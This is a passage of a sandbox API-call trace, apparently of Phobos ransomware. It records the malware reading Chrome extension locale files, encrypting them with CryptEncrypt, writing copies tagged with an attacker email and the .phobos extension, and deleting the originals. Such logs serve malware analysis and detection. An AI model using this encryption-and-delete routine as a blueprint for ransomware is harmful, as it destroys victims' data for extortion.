lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.488] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.488] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.489] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.489] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.489] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x269, lpOverlapped=0x0) returned 1 [0157.609] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x270, dwBufLen=0x270 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x270) returned 1 [0157.609] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x270, lpOverlapped=0x0) returned 1 [0157.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0157.610] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.610] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.610] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.610] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.610] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.610] CloseHandle (hObject=0x130) returned 1 [0157.610] CloseHandle (hObject=0x134) returned 1 [0157.611] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json")) returned 1 [0157.611] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.612] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=778) returned 1 [0157.612] CloseHandle (hObject=0x134) returned 1 [0157.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json")) returned 0x2020 [0157.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.613] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.613] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.613] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.613] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.613] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x30a, lpOverlapped=0x0) returned 1 [0158.129] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x310, dwBufLen=0x310 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x310) returned 1 [0158.129] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x310, lpOverlapped=0x0) returned 1 [0158.130] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0158.130] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.130] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0158.130] CryptDestroyKey (hKey=0xa32c28) returned 1 [0158.130] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0158.131] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0158.131] CloseHandle (hObject=0x134) returned 1 [0158.131] CloseHandle (hObject=0x130) returned 1 [0158.131] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json")) returned 1 [0158.132] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0158.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0158.132] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=686) returned 1 [0158.132] CloseHandle (hObject=0x130) returned 1 [0158.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json")) returned 0x2020 [0158.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0158.133] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.133] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0158.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0158.133] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.133] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2ae, lpOverlapped=0x0) returned 1 [0158.184] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b0, dwBufLen=0x2b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b0) returned 1 [0158.184] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2b0, lpOverlapped=0x0) returned 1 [0158.185] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0158.185] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.185] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0158.185] CryptDestroyKey (hKey=0xa32de8) returned 1 [0158.185] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0158.185] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0158.185] CloseHandle (hObject=0x130) returned 1 [0158.185] CloseHandle (hObject=0x134) returned 1 [0158.185] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json")) returned 1 [0158.186] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0158.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0158.187] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=644) returned 1 [0158.187] CloseHandle (hObject=0x134) returned 1 [0158.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json")) returned 0x2020 [0158.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0158.187] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.187] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0158.188] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0158.188] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.188] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x284, lpOverlapped=0x0) returned 1 [0158.198] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0158.198] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0158.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0158.199] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.199] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0158.199] CryptDestroyKey (hKey=0xa32de8) returned 1 [0158.199] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0158.199] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0158.199] CloseHandle (hObject=0x134) returned 1 [0158.199] CloseHandle (hObject=0x130) returned 1 [0158.199] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json")) returned 1 [0158.200] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0158.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0158.201] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=666) returned 1 [0158.201] CloseHandle (hObject=0x130) returned 1 [0158.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json")) returned 0x2020 [0158.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0158.201] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.201] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0158.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0158.204] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0158.204] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0158.204] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x29a, lpOverlapped=0x0) returned 1 [0158.481] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, 